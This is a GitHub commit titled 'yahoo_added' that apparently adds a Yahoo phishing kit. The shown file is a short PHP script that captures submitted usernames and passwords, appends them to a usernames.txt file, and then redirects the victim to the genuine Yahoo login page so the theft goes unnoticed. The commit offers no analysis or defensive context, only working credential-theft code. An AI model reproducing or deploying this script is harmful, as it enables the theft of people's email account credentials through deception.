yahoo_added

This commit is contained in:
Usama Abdul Sattar 2018-04-24 19:20:50 +05:00 committed by GitHub
parent 3bbee13648
commit 896e0bc214
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 403 additions and 0 deletions

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,14 @@
<?php
$var = $_POST['username'];
$var2 = $_POST['password'];
$myFile = file_get_contents("protect.html");
$searchString = "<html><title>WELCOME</title></html>";
if($myFile != $searchString) {
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
header('Location:https://login.yahoo.com');
}
if($myFile != $searchString) {
echo "LOGIN SUCCESSFULL";
}
exit();
?>

Binary file not shown.

After

Width:  |  Height:  |  Size: 3.0 KiB